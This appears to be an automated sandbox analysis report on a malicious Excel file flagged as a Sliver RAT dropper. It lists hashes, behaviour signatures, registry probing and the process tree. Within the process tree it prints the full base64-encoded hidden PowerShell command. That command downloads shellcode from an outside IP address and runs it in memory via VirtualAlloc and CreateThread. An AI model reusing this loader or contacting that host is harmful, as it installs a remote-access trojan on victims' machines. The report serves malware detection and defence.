Analysis
-
max time kernel
58s -
max time network
59s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
11-11-2024 22:05
Behavioral task
behavioral1
Sample
805984664b76d75b083fa4561dbf0f492cd19515fc9c40f1c9fdb65c9e7911a3.xls
Resource
win7-20240729-en
General
-
Target
805984664b76d75b083fa4561dbf0f492cd19515fc9c40f1c9fdb65c9e7911a3.xls
-
Size
46KB
-
MD5
236f5c306176468cac13411c07e29726
-
SHA1
181a335912f689337a35685a728993199512c37a
-
SHA256
805984664b76d75b083fa4561dbf0f492cd19515fc9c40f1c9fdb65c9e7911a3
-
SHA512
c8f3c023c3a2d8ed8d438aab86b9ca01ab1538fb264c8fea382ecb462b05870d0a4bbda730be86cf2ec33d61450221f4fb0fb660c164b2370c02acfc132d4cd1
-
SSDEEP
768:G4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:1SFsv66g3KnF439NKC54kkGfn+cL2Xd+
Malware Config
Extracted
https://194.182.164.149:8080/fontawesome.woff
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 1600 3664 powershell.exe 82 -
Sliver RAT v2 6 IoCs
Processes:
resource yara_rule behavioral2/memory/1600-63-0x000002747AC90000-0x000002747B70E000-memory.dmp SliverRAT_v2 behavioral2/memory/1600-64-0x000002747C190000-0x000002747CC76000-memory.dmp SliverRAT_v2 behavioral2/memory/1600-66-0x000002747C190000-0x000002747CC76000-memory.dmp SliverRAT_v2 behavioral2/memory/1600-65-0x000002747C190000-0x000002747CC76000-memory.dmp SliverRAT_v2 behavioral2/memory/1600-67-0x000002747C190000-0x000002747CC76000-memory.dmp SliverRAT_v2 behavioral2/memory/1600-75-0x000002747C190000-0x000002747CC76000-memory.dmp SliverRAT_v2 -
Sliver family
-
Blocklisted process makes network request 27 IoCs
Processes:
powershell.exeflow pid Process 24 1600 powershell.exe 26 1600 powershell.exe 31 1600 powershell.exe 33 1600 powershell.exe 36 1600 powershell.exe 37 1600 powershell.exe 41 1600 powershell.exe 42 1600 powershell.exe 43 1600 powershell.exe 44 1600 powershell.exe 45 1600 powershell.exe 46 1600 powershell.exe 47 1600 powershell.exe 53 1600 powershell.exe 61 1600 powershell.exe 62 1600 powershell.exe 63 1600 powershell.exe 64 1600 powershell.exe 65 1600 powershell.exe 66 1600 powershell.exe 67 1600 powershell.exe 68 1600 powershell.exe 69 1600 powershell.exe 70 1600 powershell.exe 71 1600 powershell.exe 72 1600 powershell.exe 73 1600 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid Process 3664 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid Process 1600 powershell.exe 1600 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid Process Token: SeDebugPrivilege 1600 powershell.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
EXCEL.EXEpid Process 3664 EXCEL.EXE 3664 EXCEL.EXE 3664 EXCEL.EXE 3664 EXCEL.EXE 3664 EXCEL.EXE 3664 EXCEL.EXE 3664 EXCEL.EXE 3664 EXCEL.EXE 3664 EXCEL.EXE 3664 EXCEL.EXE 3664 EXCEL.EXE 3664 EXCEL.EXE -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
EXCEL.EXEpowershell.execsc.exedescription pid Process procid_target PID 3664 wrote to memory of 1600 3664 EXCEL.EXE 87 PID 3664 wrote to memory of 1600 3664 EXCEL.EXE 87 PID 1600 wrote to memory of 1356 1600 powershell.exe 90 PID 1600 wrote to memory of 1356 1600 powershell.exe 90 PID 1356 wrote to memory of 1940 1356 csc.exe 91 PID 1356 wrote to memory of 1940 1356 csc.exe 91
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\805984664b76d75b083fa4561dbf0f492cd19515fc9c40f1c9fdb65c9e7911a3.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3664 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1600 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rbqy3pxx\rbqy3pxx.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1356 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES85AB.tmp" "c:\Users\Admin\AppData\Local\Temp\rbqy3pxx\CSC990E750EC194422EB969F9DBCF7455F.TMP"4⤵PID:1940
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5829e5653fe663558760c7c71d6ceff75
SHA15fb2b8459032113ab6e694d8c5bd2d69463ae0cd
SHA2561d4008586fe0daff59ecec7ea2ea212ed36441e29af6186413c75af2d7b369fc
SHA512c9482ef08ddc2b1c25e8631f4ff0a48a85bee9e9fa151da10fa1850f1873bc0bec25d4770592927c9a0232801f38f8062d6b419857e42d49c2cf74987eaf9701
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD5ff6e871733b3bc0206f71fb4288bd870
SHA197ca4078f6283fca7ce2472c913f380ea17f575d
SHA25678e262d59eb6bcc0054971a177d22cb5c92327aa321aac86c667ae38b761c138
SHA512b33de9f750c22d8f3b2f969ec018e4d5bd8eaeef970fefd93752faf33bff7217c0cf55b4c1d7a5ad8be81689f15c483e286c5d5990bc57c5b5cbf33c8390079b
-
Filesize
652B
MD55f6244668a7705d6e1ce327a93437bf9
SHA196d4efe14eead5e5533d9a1fd04f2a7c6de6881c
SHA256ea6870be128a907ed83196f44ca60fae9c3afeec8453cf9800abd6a23d913b0a
SHA5124c39e4e585ae5383bc35bee057bd728cc0cf5121d8de9007f9e3f78da7de38d036842fa8c5275d541221caa516887afd15b7ca9705088fc2d971d66ccd556b18
-
Filesize
631B
MD5f4dd5c682eb7b3b679f084261bfc7c4c
SHA170f75d7a4e42c185eb09139ed3c6f7338a2219c2
SHA2562908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319
SHA5128f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d
-
Filesize
369B
MD5eb4faf0b4a2cb7f3a320657df007c087
SHA1cc702ee2d41170ae36a0821c579504fe41952d22
SHA256a9273e30f9a8bca7acf9674f3be0e8af5f480c5eb17e0e7ee594a778eef666eb
SHA51224902ccc82ff13a3ff6cb985685987f74db828d60f7e2204d87a889baa0ecee652fb858f7a31cbf331e40f96fae4af2b86bb39b4dac5bfe895ed5bc816b605b8